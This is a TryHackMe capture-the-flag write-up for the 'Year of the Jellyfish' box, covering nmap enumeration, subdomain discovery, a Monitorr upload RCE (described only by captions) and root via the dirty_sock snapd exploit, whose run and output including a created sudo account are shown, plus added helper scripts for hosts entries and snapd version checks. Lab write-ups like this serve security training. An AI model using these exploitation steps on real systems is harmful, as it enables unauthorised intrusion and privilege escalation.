Year of the Jellyfish — TryHackMe

Some boxes sting…

Summary

Enumeration

# Nmap 7.91 scan initiated Sat Apr 24 14:52:29 2021 as: nmap -p- -sCV -v -oN nmap/full 34.241.178.117
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.29
|_http-title: Did not follow redirect to https://robyns-petshop.thm/
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Robyn's Pet Shop
| ssl-cert: Subject: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB
| Subject Alternative Name: DNS:robyns-petshop.thm, DNS:monitorr.robyns-petshop.thm, DNS:beta.robyns-petshop.thm, DNS:dev.robyns-petshop.thm
| Issuer: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB
8000/tcp open http-alt
| fingerprint-strings:
| HTTP/1.1 400 Bad Request
8096/tcp open unknown
| fingerprint-strings:
| HTTP/1.1 404 Not Found
| Server: Kestrel
22222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

# Nmap done at Sat Apr 24 14:55:52 2021 -- 1 IP address (1 host up) scanned in 203.13 seconds
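The certificate's Subject Alternative Name entries are the next enumeration targets (monitorr., beta. and dev. all appear later in the writeup), and none of them resolve until they are added to /etc/hosts. As an added example that is not part of the original writeup, the POSIX shell function below turns the SAN line from the nmap ssl-cert script into one /etc/hosts entry pointing every DNS name at the target IP from the scan. The SAN line is a copy of the one above, embedded so the snippet runs offline.

```shell
#!/bin/sh
# Added example (not from the original writeup): build an /etc/hosts line from
# the "Subject Alternative Name" line that nmap's ssl-cert script prints.

# Constructed input: a verbatim copy of the SAN line from the scan above.
SAN_LINE='| Subject Alternative Name: DNS:robyns-petshop.thm, DNS:monitorr.robyns-petshop.thm, DNS:beta.robyns-petshop.thm, DNS:dev.robyns-petshop.thm'

# san_hosts_line IP SAN_LINE
#   Prints "IP name1 name2 ..." with duplicates removed.
#   Only DNS: entries are used; IP: and email: SAN types are ignored.
#   Returns 1 when the line carries no DNS names.
san_hosts_line() {
    ip="$1"
    line="$2"
    names=$(printf '%s\n' "$line" \
        | tr ',' '\n' \
        | sed -n 's/.*DNS:\([A-Za-z0-9.-]*\).*/\1/p' \
        | awk '!seen[$0]++' \
        | tr '\n' ' ')
    names=${names% }
    [ -n "$names" ] || return 1
    printf '%s %s\n' "$ip" "$names"
}

# On the attack box, with the IP from the scan:
#   san_hosts_line 34.241.178.117 "$SAN_LINE" | sudo tee -a /etc/hosts
```

Hostnames from a certificate are only a hint: the Apache vhost configuration decides what is actually served, so each name still needs to be requested separately (the redirect to https://robyns-petshop.thm/ on port 80 is the first sign that the server cares about the Host header).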

Ports

HTTPS home page (Pico CMS)
beta.robyns-petshop.thm development page
Jellyfin system info
curl -s https://monitorr.robyns-petshop.thm/assets/php/phpinfo.php -k | grep -Eo "10\.([0-9]{1,3}\.?){3}"
datausers.db content
Monitorr 1.7.6m

Foothold

requests.exceptions.SSLError: HTTPSConnectionPool(host='monitorr.robyns-petshop.thm', port=443): Max retries exceeded with url: /assets/php/upload.php (Caused by SSLError(SSLError("bad handshake: Error([('SSL routines', 'tls_process_server_certificate', 'certificate verify failed')])")))
The RCE exploit with TLS certificate verification disabled and the urllib3 InsecureRequestWarning suppressed (the server certificate is self-signed: in the nmap output its issuer is identical to its subject, so the default verification in requests fails)
The exploit, modified to print the response
Exploit response
Monitorr services configuration page
Final working exploit
upload.php
iptables rules
www-data shell

Root

snapd version
[+] [CVE-2019-7304] dirty_sock
Details: https://initblog.com/2019/dirty-sock/
Exposure: less probable
Tags: ubuntu=18.10,mint=19
Download URL: https://github.com/initstring/dirty_sock/archive/master.zip
Comments: Distros use own versioning scheme. Manual verification needed.
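"Manual verification needed" means checking the installed snapd release rather than trusting the distro tag: CVE-2019-7304 (dirty_sock) affects snapd before 2.37.1, and Ubuntu appends a packaging suffix such as +18.04 that a plain string comparison trips over. The following is an added example, not the author's code or part of the dirty_sock project; the `snap version` output it parses is constructed for the demonstration, not copied from the box.

```shell
#!/bin/sh
# Added example (not from the original writeup): manual version check for
# CVE-2019-7304. snapd < 2.37.1 is affected; the fixed version is taken from
# the CVE description.

# Constructed sample of `snap version` output (not captured from the target).
SNAP_VERSION_OUTPUT='snap    2.32.5+18.04
snapd   2.32.5+18.04
series  16
ubuntu  18.04
kernel  4.15.0-1089-aws'

# snapd_version_from_output "<snap version output>"
#   Prints the bare snapd version, with the "+18.04" / "~rc" packaging suffix
#   stripped so it can be compared numerically.
snapd_version_from_output() {
    printf '%s\n' "$1" | awk '$1 == "snapd" { sub(/[+~].*$/, "", $2); print $2 }'
}

# version_lt A B -> exit 0 when dotted version A is strictly lower than B.
# Missing components count as 0, so 2.37 < 2.37.1 as expected.
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1
    }'
}

# dirty_sock_vulnerable VERSION -> exit 0 when VERSION is below 2.37.1.
# Accepts the raw Ubuntu string (e.g. 2.32.5+18.04) as well as a bare version.
dirty_sock_vulnerable() {
    fixed=2.37.1
    v=${1%%[+~]*}
    [ -n "$v" ] || return 2
    version_lt "$v" "$fixed"
}

# On the target:
#   v=$(snapd_version_from_output "$(snap version)")
#   dirty_sock_vulnerable "$v" && echo "snapd $v: dirty_sock applies"
```

The check only says whether the release predates the fix; it still needs snapd to be running and the socket to be reachable by the current user, which is exactly what the exploit run below confirms.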
python3 ./dirty_sockv2.py

[+] Slipped dirty sock on random socket file: /tmp/iywgwenujg;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...

********************
Success! You can now `su` to the following account and use sudo:
username: dirty_sock
password: dirty_sock
********************
Switch to root
My THM badge